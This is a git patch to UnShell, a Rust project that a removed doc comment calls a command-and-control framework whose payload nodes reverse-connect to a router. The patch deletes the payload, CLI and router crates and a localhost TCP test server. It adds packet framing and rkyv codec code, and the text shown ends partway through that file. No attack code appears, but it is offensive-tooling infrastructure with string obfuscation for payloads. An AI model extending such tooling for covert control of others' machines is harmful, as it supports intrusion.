From dcf0fe230b071eb516ab3f3e3c9a6d7188800f29 Mon Sep 17 00:00:00 2001 From: Michael Mikovsky <77305074+Astatin3@users.noreply.github.com> Date: Fri, 24 Apr 2026 12:32:24 -0600 Subject: [PATCH] Work on implementing the protocol. --- Cargo.lock | 160 +---- Cargo.toml | 28 +- no-alloc-network-test/.cargo/config.toml | 2 - no-alloc-network-test/Cargo.lock | 7 - no-alloc-network-test/Cargo.toml | 12 - no-alloc-network-test/src/main.rs | 401 ------------ src/lib.rs | 67 +- src/logger/mod.rs | 7 +- src/protocol/codec.rs | 237 +++++++ src/protocol/content.rs | 59 -- src/protocol/introspection.rs | 32 + src/protocol/mod.rs | 49 +- src/protocol/types.rs | 357 ++-------- src/protocol/validation.rs | 189 ++++++ src/transport/channel.rs | 77 +++ src/transport/mod.rs | 299 ++------- src/transport/tcp.rs | 398 ++---------- src/tree/endpoint.rs | 793 +++++++++++++++++++++++ src/tree/hook.rs | 142 ++++ src/tree/mod.rs | 526 +-------------- src/tree/routing.rs | 150 +++++ ush-cli/Cargo.toml | 28 - ush-cli/src/commands.rs | 189 ------ ush-cli/src/main.rs | 33 - ush-cli/src/repl.rs | 336 ---------- ush-cli/src/session.rs | 67 -- ush-payload/Cargo.toml | 35 - ush-payload/README.md | 2 - ush-payload/src/main.rs | 232 ------- ush-payload/src/modules/info.rs | 88 --- ush-payload/src/modules/mod.rs | 19 - ush-router/Cargo.toml | 29 - ush-router/src/main.rs | 42 -- ush-router/src/node.rs | 330 ---------- ush-router/src/registry.rs | 258 -------- ush-router/src/router.rs | 49 -- 36 files changed, 1874 insertions(+), 3855 deletions(-) delete mode 100644 no-alloc-network-test/.cargo/config.toml delete mode 100644 no-alloc-network-test/Cargo.lock delete mode 100644 no-alloc-network-test/Cargo.toml delete mode 100644 no-alloc-network-test/src/main.rs create mode 100644 src/protocol/codec.rs delete mode 100644 src/protocol/content.rs create mode 100644 src/protocol/introspection.rs create mode 100644 src/protocol/validation.rs create mode 100644 src/transport/channel.rs create mode 100644 src/tree/endpoint.rs create mode 100644 src/tree/hook.rs create mode 100644 src/tree/routing.rs delete mode 100644 ush-cli/Cargo.toml delete mode 100644 ush-cli/src/commands.rs delete mode 100644 ush-cli/src/main.rs delete mode 100644 ush-cli/src/repl.rs delete mode 100644 ush-cli/src/session.rs delete mode 100644 ush-payload/Cargo.toml delete mode 100644 ush-payload/README.md delete mode 100644 ush-payload/src/main.rs delete mode 100644 ush-payload/src/modules/info.rs delete mode 100644 ush-payload/src/modules/mod.rs delete mode 100644 ush-router/Cargo.toml delete mode 100644 ush-router/src/main.rs delete mode 100644 ush-router/src/node.rs delete mode 100644 ush-router/src/registry.rs delete mode 100644 ush-router/src/router.rs diff --git a/Cargo.lock b/Cargo.lock index 4ae491f..b47b8d7 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -160,9 +160,9 @@ checksum = "613afe47fcd5fac7ccf1db93babcb082c5994d996f20b8b159f2ad1658eb5724" [[package]] name = "chrono" -version = "0.4.43" +version = "0.4.44" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "fac4744fb15ae8337dc853fee7fb3f4e48c0fbaa23d0afe49c447b4fab126118" +checksum = "c673075a2e0e5f4a1dde27ce9dee1ea4558c7ffe648f576438a20ca1d2acc4b0" dependencies = [ "iana-time-zone", "js-sys", @@ -181,15 +181,6 @@ dependencies = [ "inout", ] -[[package]] -name = "clipboard-win" -version = "5.4.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "bde03770d3df201d4fb868f2c9c59e66a3e4e2bd06692a0fe701e7103c7e84d4" -dependencies = [ - "error-code", -] - [[package]] name = "core-foundation-sys" version = "0.8.7" @@ -240,24 +231,12 @@ dependencies = [ "crypto-common", ] -[[package]] -name = "endian-type" -version = "0.2.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "869b0adbda23651a9c5c0c3d270aac9fcb52e8622a8f2b17e57802d7791962f2" - [[package]] name = "equivalent" version = "1.0.2" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "877a4ace8713b0bcf2a4e7eec82529c029f1d0619886d18145fea96c3ffe5c0f" -[[package]] -name = "error-code" -version = "3.3.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "dea2df4cf52843e0452895c455a1a2cfbb842a1e7329671acf418fdc53ed4c59" - [[package]] name = "find-msvc-tools" version = "0.1.8" @@ -292,6 +271,12 @@ version = "0.16.1" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "841d1cc9bed7f9236f321df977030373f4a4163ae1a7dbfe1a51a2c1a51d9100" +[[package]] +name = "hashbrown" +version = "0.17.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "4f467dd6dccf739c208452f8014c75c18bb8301b050ad1cfb27153803edb0f51" + [[package]] name = "hex" version = "0.4.3" @@ -304,15 +289,6 @@ version = "1.1.0" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "e712f64ec3850b98572bffac52e2c6f282b29fe6c5fa6d42334b30be438d95c1" -[[package]] -name = "home" -version = "0.5.12" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "cc627f471c528ff0c4a49e1d5e60450c8f6461dd6d10ba9dcd3a61d3dff7728d" -dependencies = [ - "windows-sys", -] - [[package]] name = "hybrid-array" version = "0.4.7" @@ -353,7 +329,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "7714e70437a7dc3ac8eb7e6f8df75fd8eb422675fc7678aff7364301092b1017" dependencies = [ "equivalent", - "hashbrown", + "hashbrown 0.16.1", ] [[package]] @@ -423,27 +399,6 @@ dependencies = [ "syn 2.0.114", ] -[[package]] -name = "nibble_vec" -version = "0.1.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "77a5d83df9f36fe23f0c3648c6bbb8b0298bb5f1939c8f2704431371f4b84d43" -dependencies = [ - "smallvec", -] - -[[package]] -name = "nix" -version = "0.31.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5d6d0705320c1e6ba1d912b5e37cf18071b6c2e9b7fa8215a1e8a7651966f5d3" -dependencies = [ - "bitflags 2.11.1", - "cfg-if", - "cfg_aliases 0.2.1", - "libc", -] - [[package]] name = "num-traits" version = "0.2.19" @@ -535,16 +490,6 @@ version = "5.3.0" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "69cdb34c158ceb288df11e18b4bd39de994f6657d83847bdffdbd7f346754b0f" -[[package]] -name = "radix_trie" -version = "0.3.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "3b4431027dcd37fc2a73ef740b5f233aa805897935b8bce0195e41bbf9a3289a" -dependencies = [ - "endian-type", - "nibble_vec", -] - [[package]] name = "rancor" version = "0.1.1" @@ -632,13 +577,13 @@ dependencies = [ [[package]] name = "rkyv" -version = "0.8.15" +version = "0.8.16" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "1a30e631b7f4a03dee9056b8ef6982e8ba371dd5bedb74d3ec86df4499132c70" +checksum = "73389e0c99e664f919275ab5b5b0471391fe9a8de61e1dff9b1eaf56a90f16e3" dependencies = [ "bytecheck", "bytes", - "hashbrown", + "hashbrown 0.17.0", "indexmap", "munge", "ptr_meta", @@ -651,9 +596,9 @@ dependencies = [ [[package]] name = "rkyv_derive" -version = "0.8.15" +version = "0.8.16" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "8100bb34c0a1d0f907143db3149e6b4eea3c33b9ee8b189720168e818303986f" +checksum = "5d2ed0b54125315fb36bd021e82d314d1c126548f871634b483f46b31d13cac6" dependencies = [ "proc-macro2", "quote", @@ -666,27 +611,6 @@ version = "1.0.22" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "b39cdef0fa800fc44525c84ccb54a029961a8215f9619753635a9c0d2538d46d" -[[package]] -name = "rustyline" -version = "18.0.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "4a990b25f351b25139ddc7f21ee3f6f56f86d6846b74ac8fad3a719a287cd4a0" -dependencies = [ - "bitflags 2.11.1", - "cfg-if", - "clipboard-win", - "home", - "libc", - "log", - "memchr", - "nix", - "radix_trie", - "unicode-segmentation", - "unicode-width", - "utf8parse", - "windows-sys", -] - [[package]] name = "scopeguard" version = "1.2.0" @@ -819,18 +743,6 @@ version = "1.0.22" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "9312f7c4f6ff9069b165498234ce8be658059c6728633667c526e27dc2cf1df5" -[[package]] -name = "unicode-segmentation" -version = "1.13.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9629274872b2bfaf8d66f5f15725007f635594914870f65218920345aa11aa8c" - -[[package]] -name = "unicode-width" -version = "0.2.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b4ac048d71ede7ee76d585517add45da530660ef4390e49b098733c6e897f254" - [[package]] name = "unshell" version = "0.1.0" @@ -843,17 +755,6 @@ dependencies = [ "ush-obfuscate", ] -[[package]] -name = "ush-cli" -version = "0.1.0" -dependencies = [ - "crossbeam-channel", - "rkyv", - "rustyline", - "thiserror", - "unshell", -] - [[package]] name = "ush-obfuscate" version = "0.1.0" @@ -870,30 +771,6 @@ dependencies = [ "syn 2.0.114", ] -[[package]] -name = "ush-payload" -version = "0.1.0" -dependencies = [ - "rkyv", - "unshell", -] - -[[package]] -name = "ush-router" -version = "0.1.0" -dependencies = [ - "crossbeam-channel", - "rkyv", - "thiserror", - "unshell", -] - -[[package]] -name = "utf8parse" -version = "0.2.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "06abde3611657adf66d383f00b093d7faecc7fa57071cce2578660c9f1010821" - [[package]] name = "uuid" version = "1.22.0" @@ -1045,15 +922,6 @@ dependencies = [ "windows-link", ] -[[package]] -name = "windows-sys" -version = "0.61.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ae137229bcbd6cdf0f7b80a31df61766145077ddf49416a728b02cb3921ff3fc" -dependencies = [ - "windows-link", -] - [[package]] name = "wit-bindgen" version = "0.51.0" diff --git a/Cargo.toml b/Cargo.toml index 7319f5c..93116d5 100644 --- a/Cargo.toml +++ b/Cargo.toml @@ -19,16 +19,7 @@ cargo-features = ["trim-paths", "panic-immediate-abort"] # minimize — size-optimized, for the payload binary [workspace] -members = [ - # Core binaries - "ush-router", - "ush-payload", - "ush-cli", - - # Libraries - "ush-obfuscate", - "base62", "no-alloc-network-test", -] +members = [] resolver = "2" # --------------------------------------------------------------------------- @@ -48,7 +39,7 @@ include = ["LICENSE", "**/*.rs", "Cargo.toml"] # --------------------------------------------------------------------------- [workspace.dependencies] # Serialisation -rkyv = "0.8.15" # zero-copy deserialisation framework +rkyv = "0.8.16" # zero-copy deserialisation framework serde = { version = "1.0.228", features = ["derive"] } serde_json = "1.0.149" @@ -59,7 +50,7 @@ crossbeam-channel = "0.5.15" # multi-producer multi-consumer channels thiserror = "2.0.18" # derive(Error) macro # Logging / time -chrono = "0.4.42" +chrono = "0.4.44" # Utilities static_init = "1.0.4" # safe static initialisation @@ -85,15 +76,21 @@ description = "UnShell core library: protocol types, transport, and tree routing # The payload binary also links std for now but the library itself is no_std. [features] -default = [] +default = ["std", "sim"] + +# Enable std-backed modules such as simulated transports and richer runtime helpers. +std = [] # Enable the structured logger (uses chrono for timestamps) -log = [] +log = ["std"] log_debug = ["log", "dep:chrono"] # Enable TCP transport (requires std). All std binaries enable this. # The payload binary can also enable it; only omit it for bare-metal embedded targets. -tcp = [] +tcp = ["std"] + +# Enable the crossbeam-channel simulated transport. +sim = ["std"] # Obfuscation support (compile-time string obfuscation via proc-macro) obfuscate_aes = ["ush-obfuscate/obfuscate_aes"] @@ -168,7 +165,6 @@ manual_string_new = "warn" needless_borrow = "warn" needless_pass_by_value = "warn" str_to_string = "warn" -string_to_string = "warn" uninlined_format_args = "warn" use_self = "warn" # --- Documentation --- diff --git a/no-alloc-network-test/.cargo/config.toml b/no-alloc-network-test/.cargo/config.toml deleted file mode 100644 index 73066e8..0000000 --- a/no-alloc-network-test/.cargo/config.toml +++ /dev/null @@ -1,2 +0,0 @@ -[unstable] -build-std = ["core"] \ No newline at end of file diff --git a/no-alloc-network-test/Cargo.lock b/no-alloc-network-test/Cargo.lock deleted file mode 100644 index 0d41ed1..0000000 --- a/no-alloc-network-test/Cargo.lock +++ /dev/null @@ -1,7 +0,0 @@ -# This file is automatically @generated by Cargo. -# It is not intended for manual editing. -version = 4 - -[[package]] -name = "no-alloc-network-test" -version = "0.1.0" diff --git a/no-alloc-network-test/Cargo.toml b/no-alloc-network-test/Cargo.toml deleted file mode 100644 index 0b88ec2..0000000 --- a/no-alloc-network-test/Cargo.toml +++ /dev/null @@ -1,12 +0,0 @@ -[package] -name = "no-alloc-network-test" -version = "0.1.0" -edition = "2024" -authors = ["ASTATIN3"] -license = "MIT" -repository = "https://github.com/Astatin3/unshell" -include = ["LICENSE", "**/*.rs", "Cargo.toml"] - -[workspace] - -[dependencies] \ No newline at end of file diff --git a/no-alloc-network-test/src/main.rs b/no-alloc-network-test/src/main.rs deleted file mode 100644 index a915f3c..0000000 --- a/no-alloc-network-test/src/main.rs +++ /dev/null @@ -1,401 +0,0 @@ -//! # TCP Network Stack using Raw Syscalls -//! -//! A TCP server using raw x86/64 Linux syscalls via inline assembly - no libc, no std. -//! -//! ## Usage -//! ```bash -//! cargo run -//! nc 127.0.0.1 1337 -//! ``` - -#![no_std] -#![no_main] - -use core::arch::asm; - -const PORT: u16 = 1337; -const BACKLOG: i32 = 128; - -const AF_INET: i32 = 2; -const SOCK_STREAM: i32 = 1; -const IPPROTO_IP: i32 = 0; - -const SYS_SOCKET: i32 = 41; -const SYS_BIND: i32 = 49; -const SYS_LISTEN: i32 = 50; -const SYS_ACCEPT: i32 = 43; -const SYS_WRITE: i32 = 1; -const SYS_CLOSE: i32 = 3; -const SYS_EXIT: i32 = 60; - -#[repr(C)] -struct SockAddrIn { - sin_family: u16, - sin_port: u16, - sin_addr: u32, - sin_zero: [u8; 8], -} - -#[repr(C)] -struct SockLen { - len: u32, -} - -impl SockLen { - fn new() -> Self { - Self { len: core::mem::size_of::() as u32 } - } -} - -#[unsafe(no_mangle)] -pub extern "C" fn _start() { - log_info("starting tcp server"); - - let server_fd = match create_socket() { - Ok(fd) => { - log_num("socket fd=", fd as i64); - fd - } - Err(err) => { - log_num("socket() failed errno=", err.errno as i64); - exit_with(1) - } - }; - - if let Err(err) = bind_socket(server_fd, PORT) { - log_num("bind() failed errno=", err.errno as i64); - exit_with(1); - } - log_info("bound to 127.0.0.1"); - - if let Err(err) = listen_socket(server_fd, BACKLOG) { - log_num("listen() failed errno=", err.errno as i64); - exit_with(1); - } - - log_info("socket is now listening"); - - print_string("TCP Server listening on port "); - print_u16(PORT); - print_string("\n"); - - let mut counter: u32 = 0; - - loop { - match accept_client(server_fd) { - Ok(client_fd) => { - log_num("accepted client fd=", client_fd as i64); - print_string("Connect with: nc 127.0.0.1 "); - print_u16(PORT); - print_string("\n"); - - counter += 1; - let message = make_packet(counter); - let _ = syscall3(SYS_WRITE, client_fd as u64, message.as_ptr() as u64, message.len as u64); - - syscall1(SYS_CLOSE, client_fd as u64); - print_string("Closed\n"); - } - Err(err) => { - log_num("accept() failed errno=", err.errno as i64); - continue; - } - } - } -} - -fn syscall1(num: i32, arg1: u64) -> i64 { - let result: i64; - unsafe { - asm!( - "syscall", - in("rax") num as u64, - in("rdi") arg1, - lateout("rax") result, - lateout("rcx") _, - lateout("r11") _, - options(nostack) - ); - } - result -} - -fn syscall3(num: i32, arg1: u64, arg2: u64, arg3: u64) -> i64 { - let result: i64; - unsafe { - asm!( - "syscall", - in("rax") num as u64, - in("rdi") arg1, - in("rsi") arg2, - in("rdx") arg3, - lateout("rax") result, - lateout("rcx") _, - lateout("r11") _, - options(nostack) - ); - } - result -} - -fn syscall6(num: i32, arg1: u64, arg2: u64, arg3: u64, arg4: u64, arg5: u64, arg6: u64) -> i64 { - let result: i64; - unsafe { - asm!( - "syscall", - in("rax") num as u64, - in("rdi") arg1, - in("rsi") arg2, - in("rdx") arg3, - in("r10") arg4, - in("r8") arg5, - in("r9") arg6, - lateout("rax") result, - lateout("rcx") _, - lateout("r11") _, - options(nostack) - ); - } - result -} - -fn create_socket() -> Result { - let fd = syscall3(SYS_SOCKET, AF_INET as u64, SOCK_STREAM as u64, IPPROTO_IP as u64); - if fd < 0 { - return Err(SysErr::from_ret(fd)); - } - Ok(fd as i32) -} - -fn bind_socket(fd: i32, port: u16) -> Result<(), SysErr> { - let addr = SockAddrIn { - sin_family: AF_INET as u16, - sin_port: port.to_be(), - sin_addr: 0x0100007F, - sin_zero: [0; 8], - }; - - let result = syscall6( - SYS_BIND, - fd as u64, - (&addr as *const SockAddrIn) as u64, - core::mem::size_of::() as u64, - 0, - 0, - 0, - ); - if result < 0 { - return Err(SysErr::from_ret(result)); - } - Ok(()) -} - -fn listen_socket(fd: i32, backlog: i32) -> Result<(), SysErr> { - let result = syscall2(SYS_LISTEN, fd as u64, backlog as u64); - if result < 0 { - return Err(SysErr::from_ret(result)); - } - Ok(()) -} - -fn syscall2(num: i32, arg1: u64, arg2: u64) -> i64 { - let result: i64; - unsafe { - asm!( - "syscall", - in("rax") num as u64, - in("rdi") arg1, - in("rsi") arg2, - lateout("rax") result, - lateout("rcx") _, - lateout("r11") _, - options(nostack) - ); - } - result -} - -fn accept_client(server_fd: i32) -> Result { - let mut addr: SockAddrIn = SockAddrIn { - sin_family: 0, - sin_port: 0, - sin_addr: 0, - sin_zero: [0; 8], - }; - let mut addr_len: SockLen = SockLen::new(); - - let client_fd = syscall6( - SYS_ACCEPT, - server_fd as u64, - (&mut addr as *mut SockAddrIn) as u64, - (&mut addr_len as *mut SockLen) as u64, - 0, - 0, - 0, - ); - - if client_fd < 0 { - return Err(SysErr::from_ret(client_fd)); - } - Ok(client_fd as i32) -} - -#[derive(Clone, Copy)] -struct SysErr { - errno: i32, -} - -impl SysErr { - fn from_ret(ret: i64) -> Self { - Self { errno: (-ret) as i32 } - } -} - -fn exit_with(code: i32) -> ! { - let _ = syscall1(SYS_EXIT, code as u64); - loop {} -} - -fn log_info(msg: &str) { - write_stderr("[net] "); - write_stderr(msg); - write_stderr("\n"); -} - -fn log_num(prefix: &str, value: i64) { - write_stderr("[net] "); - write_stderr(prefix); - print_i64_stderr(value); - write_stderr("\n"); -} - -fn write_stderr(s: &str) { - let _ = syscall3(SYS_WRITE, 2, s.as_ptr() as u64, s.len() as u64); -} - -fn print_i64_stderr(n: i64) { - if n < 0 { - write_stderr("-"); - } - print_u64_stderr(n.unsigned_abs()); -} - -fn print_u64_stderr(mut n: u64) { - let mut buf = [0u8; 20]; - if n == 0 { - buf[0] = b'0'; - let _ = syscall3(SYS_WRITE, 2, buf.as_ptr() as u64, 1); - return; - } - - let mut len = 0usize; - while n > 0 { - buf[len] = b'0' + (n % 10) as u8; - len += 1; - n /= 10; - } - let mut out = [0u8; 20]; - let mut i = 0usize; - while i < len { - out[i] = buf[len - 1 - i]; - i += 1; - } - let _ = syscall3(SYS_WRITE, 2, out.as_ptr() as u64, len as u64); -} - -fn print_string(s: &str) { - let stdout = 1u64; - let buf_ptr = s.as_bytes().as_ptr(); - let len = s.len() as u64; - let _ = syscall3(SYS_WRITE, stdout, buf_ptr as u64, len); -} - -fn print_u16(n: u16) { - let mut buf = [0u8; 6]; - let mut pos = 0; - - if n == 0 { - buf[0] = b'0'; - pos = 1; - } else { - let mut digits = [0u8; 5]; - let mut count = 0; - let mut num = n; - while num > 0 { - digits[count] = b'0' + (num % 10) as u8; - count += 1; - num /= 10; - } - let mut i = count; - while i > 0 { - i -= 1; - buf[pos] = digits[i]; - pos += 1; - } - } - - let _ = syscall3(SYS_WRITE, 1u64, buf.as_ptr() as u64, pos as u64); -} - -struct PacketBuf { - data: [u8; 32], - len: usize, -} - -impl PacketBuf { - fn new() -> Self { - Self { - data: [0u8; 32], - len: 0, - } - } - - fn push(&mut self, byte: u8) { - if self.len < 32 { - self.data[self.len] = byte; - self.len += 1; - } - } - - fn push_str(&mut self, s: &str) { - for &b in s.as_bytes() { - self.push(b); - } - } - - fn push_u32(&mut self, n: u32) { - if n == 0 { - self.push(b'0'); - return; - } - let mut digits = [0u8; 10]; - let mut count = 0; - let mut num = n; - while num > 0 { - digits[count] = b'0' + (num % 10) as u8; - count += 1; - num /= 10; - } - for i in (0..count).rev() { - self.push(digits[i]); - } - } - - fn as_ptr(&self) -> *const u8 { - self.data.as_ptr() - } -} - -fn make_packet(n: u32) -> PacketBuf { - let mut buf = PacketBuf::new(); - buf.push_str("Packet #"); - buf.push_u32(n); - buf.push(b'\n'); - buf -} - -#[panic_handler] -fn panic(_info: &core::panic::PanicInfo<'_>) -> ! { - log_info("panic"); - loop {} -} diff --git a/src/lib.rs b/src/lib.rs index b802724..354954c 100644 --- a/src/lib.rs +++ b/src/lib.rs @@ -1,47 +1,39 @@ -//! # UnShell Core Library +//! UnShell core protocol crate. //! -//! This crate provides the core building blocks for the UnShell C2 framework: +//! The crate now models the draft protocol in `PROTOCOL.md` directly: //! -//! - **[`protocol`]** — wire types: `PacketHeader`, `TreeRequest`, `TreeResponse`, -//! `HandshakeMessage`, `HandshakeAck`, and associated enums. -//! - **[`transport`]** — the `Transport` trait and its TCP implementation. -//! - **[`tree`]** — the `Tree` and `Endpoint` abstractions for module dispatch. -//! - **[`logger`]** — lightweight logging (no dependency on `std::io`). +//! - [`protocol`] provides the canonical wire types, framing helpers, validation, +//! and introspection payloads. +//! - [`tree`] provides an explicit enum-based tree declaration, longest-prefix +//! routing helpers, and a small endpoint runtime for tests. +//! - [`transport`] provides framed transport implementations for simulated +//! channel-based links and TCP links. +//! - [`logger`] remains available for lightweight logging. //! -//! ## `no_std` Compatibility +//! ```rust +//! use unshell::protocol::{CallMessage, HookTarget, PacketHeader, PacketType, encode_packet}; //! -//! This crate is `no_std` but requires `alloc`. It can be used in the payload -//! binary which runs without a full standard library. +//! let header = PacketHeader { +//! packet_type: PacketType::Call, +//! src_path: Vec::new(), +//! dst_path: vec!["child".into()], +//! dst_leaf: Some("echo".into()), +//! hook_id: None, +//! }; +//! let call = CallMessage { +//! procedure_id: "org.product.v1.echo.roundtrip".into(), +//! data: b"ping".to_vec(), +//! response_hook: Some(HookTarget { +//! hook_id: 1, +//! return_path: Vec::new(), +//! }), +//! }; //! -//! Binaries that have `std` available (the router, the CLI) can also use this -//! crate; they simply get `alloc` types backed by the system allocator. -//! -//! ## Architecture -//! -//! ```text -//! ┌────────────────────────────────────────────────────────────────┐ -//! │ Router / Relay │ -//! │ Reads PacketHeader → longest-prefix routes to node │ -//! │ Payload bytes forwarded opaque │ -//! └───────────┬─────────────────────────┬──────────────────────────┘ -//! │ TCP │ TCP -//! ┌────────▼────────┐ ┌─────────▼──────────────────────────┐ -//! │ Operator Node │ │ Payload Node(s) │ -//! │ (ush-cli) │ │ Local Tree + Endpoint modules │ -//! │ Interactive │ │ Reverse-connects to router │ -//! │ REPL │ │ Recv loop → dispatch → respond │ -//! └─────────────────┘ └─────────────────────────────────────┘ +//! let frame = encode_packet(&header, &call).expect("call should encode"); +//! assert!(!frame.is_empty()); //! ``` -//! -//! For the full protocol specification, see `PROTOCOL.md` in the repository root. - -// Enable std when the `tcp` feature is active (TCP transport requires it). -// Without tcp, we stay fully no_std for bare-metal payload targets. -#![cfg_attr(not(feature = "tcp"), no_std)] -// no_main is only applied in non-test builds. -// The test harness generates its own main function, so we must NOT suppress it. -#![cfg_attr(not(test), no_main)] +#![cfg_attr(not(feature = "std"), no_std)] extern crate alloc; pub mod logger; @@ -49,5 +41,4 @@ pub mod protocol; pub mod transport; pub mod tree; -// Re-export the obfuscation crate so payloads only need to depend on `unshell`. pub use ush_obfuscate as obfuscate; diff --git a/src/logger/mod.rs b/src/logger/mod.rs index b14bdb7..e8080f6 100644 --- a/src/logger/mod.rs +++ b/src/logger/mod.rs @@ -248,7 +248,12 @@ impl Logger for StderrLogger { if location.is_empty() { eprintln!("[{}] {}", record.level.as_str(), record.message); } else { - eprintln!("[{}] {} - {}", record.level.as_str(), record.message, location); + eprintln!( + "[{}] {} - {}", + record.level.as_str(), + record.message, + location + ); } } } diff --git a/src/protocol/codec.rs b/src/protocol/codec.rs new file mode 100644 index 0000000..3088eeb --- /dev/null +++ b/src/protocol/codec.rs @@ -0,0 +1,237 @@ +//! Framed packet encoding and decoding. + +use alloc::{boxed::Box, vec::Vec}; +use core::fmt; +use rkyv::{Serialize, access, deserialize, rancor::Error, to_bytes, util::AlignedVec}; + +use crate::protocol::types::{ + ArchivedCallMessage, ArchivedDataMessage, ArchivedFaultMessage, ArchivedPacketHeader, +}; +use crate::protocol::{CallMessage, DataMessage, FaultMessage, PacketHeader, PacketType}; + +/// Owned framed packet bytes. +pub type FrameBytes = Box<[u8]>; + +/// Framing or archive failure. +#[derive(Debug)] +pub enum FrameError { + /// The frame is truncated or contains trailing bytes. + Truncated, + /// Header bytes were not a valid archive. + InvalidHeader(Error), + /// Payload bytes were not a valid archive. + InvalidPayload(Error), + /// Serialization failed. + Serialize(Error), + /// The framed section exceeded the `u32` wire limit. + LengthOverflow, +} + +impl fmt::Display for FrameError { + fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { + match self { + Self::Truncated => f.write_str("truncated frame"), + Self::InvalidHeader(error) => write!(f, "invalid archived header: {error}"), + Self::InvalidPayload(error) => write!(f, "invalid archived payload: {error}"), + Self::Serialize(error) => write!(f, "serialization failed: {error}"), + Self::LengthOverflow => f.write_str("framed section exceeds u32 length"), + } + } +} + +#[cfg(feature = "std")] +impl std::error::Error for FrameError {} + +/// Borrowed view over a framed packet. +pub struct ParsedFrame<'a> { + header: PacketHeader, + payload_bytes: &'a [u8], +} + +impl<'a> ParsedFrame<'a> { + /// Returns the decoded header. + pub fn header(&self) -> &PacketHeader { + &self.header + } + + /// Returns the packet type. + pub fn packet_type(&self) -> PacketType { + self.header.packet_type + } + + /// Returns the raw payload byte section. + pub fn payload_bytes(&self) -> &'a [u8] { + self.payload_bytes + } + + /// Returns an owned header copy. + pub fn deserialize_header(&self) -> PacketHeader { + self.header.clone() + } + + /// Decodes the payload as a call. + /// + /// # Errors + /// + /// Returns [`FrameError`] when the payload bytes are not a valid archived call. + pub fn deserialize_call(&self) -> Result { + deserialize_archived_bytes::(self.payload_bytes) + } + + /// Decodes the payload as data. + /// + /// # Errors + /// + /// Returns [`FrameError`] when the payload bytes are not a valid archived data packet. + pub fn deserialize_data(&self) -> Result { + deserialize_archived_bytes::(self.payload_bytes) + } + + /// Decodes the payload as a fault. + /// + /// # Errors + /// + /// Returns [`FrameError`] when the payload bytes are not a valid archived fault. + pub fn deserialize_fault(&self) -> Result { + deserialize_archived_bytes::(self.payload_bytes) + } +} + +/// Encodes a packet header and payload into the canonical framed representation. +/// +/// # Errors +/// +/// Returns [`FrameError`] when serialization fails or a framed section exceeds the wire limit. +pub fn encode_packet

(header: &PacketHeader, payload: &P) -> Result +where + P: for<'a> Serialize< + rkyv::api::high::HighSerializer, Error>, + >, +{ + // WARNING: the simulated and TCP transports both move complete framed packets. + // One owned contiguous buffer at this boundary is therefore intentional and avoids + // scattering later hidden copies through routing code. + let header_bytes = to_bytes::(header).map_err(FrameError::Serialize)?; + let payload_bytes = to_bytes::(payload).map_err(FrameError::Serialize)?; + let header_len = u32::try_from(header_bytes.len()).map_err(|_| FrameError::LengthOverflow)?; + let payload_len = u32::try_from(payload_bytes.len()).map_err(|_| FrameError::LengthOverflow)?; + + let mut frame = Vec::with_capacity(8 + header_bytes.len() + payload_bytes.len()); + frame.extend_from_slice(&header_len.to_be_bytes()); + frame.extend_from_slice(&header_bytes); + frame.extend_from_slice(&payload_len.to_be_bytes()); + frame.extend_from_slice(&payload_bytes); + Ok(frame.into_boxed_slice()) +} + +/// Decodes a framed packet into a borrowed parsed view. +/// +/// # Errors +/// +/// Returns [`FrameError`] when the frame is truncated or the header archive is invalid. +pub fn decode_frame(bytes: &[u8]) -> Result, FrameError> { + if bytes.len() < 8 { + return Err(FrameError::Truncated); + } + + let header_len = u32::from_be_bytes( + bytes + .get(0..4) + .ok_or(FrameError::Truncated)? + .try_into() + .expect("slice width checked"), + ) as usize; + let header_start = 4usize; + let header_end = header_start + header_len; + if header_end + 4 > bytes.len() { + return Err(FrameError::Truncated); + } + + let payload_len = u32::from_be_bytes( + bytes + .get(header_end..header_end + 4) + .ok_or(FrameError::Truncated)? + .try_into() + .expect("slice width checked"), + ) as usize; + let payload_start = header_end + 4; + let payload_end = payload_start + payload_len; + if payload_end != bytes.len() { + return Err(FrameError::Truncated); + } + + // WARNING: the wire format puts a 4-byte length prefix before each archived section. + // That means the section start is not guaranteed to satisfy rkyv's aligned-access + // requirements. The header is copied into one temporary `AlignedVec` here because + // routing cannot proceed safely without a validated header. + let aligned_header = align_section( + bytes + .get(header_start..header_end) + .ok_or(FrameError::Truncated)?, + ); + let archived_header = access::(&aligned_header) + .map_err(FrameError::InvalidHeader)?; + let header = + deserialize::(archived_header).map_err(FrameError::InvalidHeader)?; + + Ok(ParsedFrame { + header, + payload_bytes: bytes + .get(payload_start..payload_end) + .ok_or(FrameError::Truncated)?, + }) +} + +/// Deserializes a standalone archived byte section. +/// +/// # Errors +/// +/// Returns [`FrameError`] when the archived bytes are invalid for the requested type. +pub fn deserialize_archived_bytes(bytes: &[u8]) -> Result +where + A: rkyv::Portable + + for<'b> rkyv::bytecheck::CheckBytes>, + T: rkyv::Archive, + A: rkyv::Deserialize>, +{ + let aligned = align_section(bytes); + let archived = access::(&aligned).map_err(FrameError::InvalidPayload)?; + deserialize::(archived).map_err(FrameError::InvalidPayload) +} + 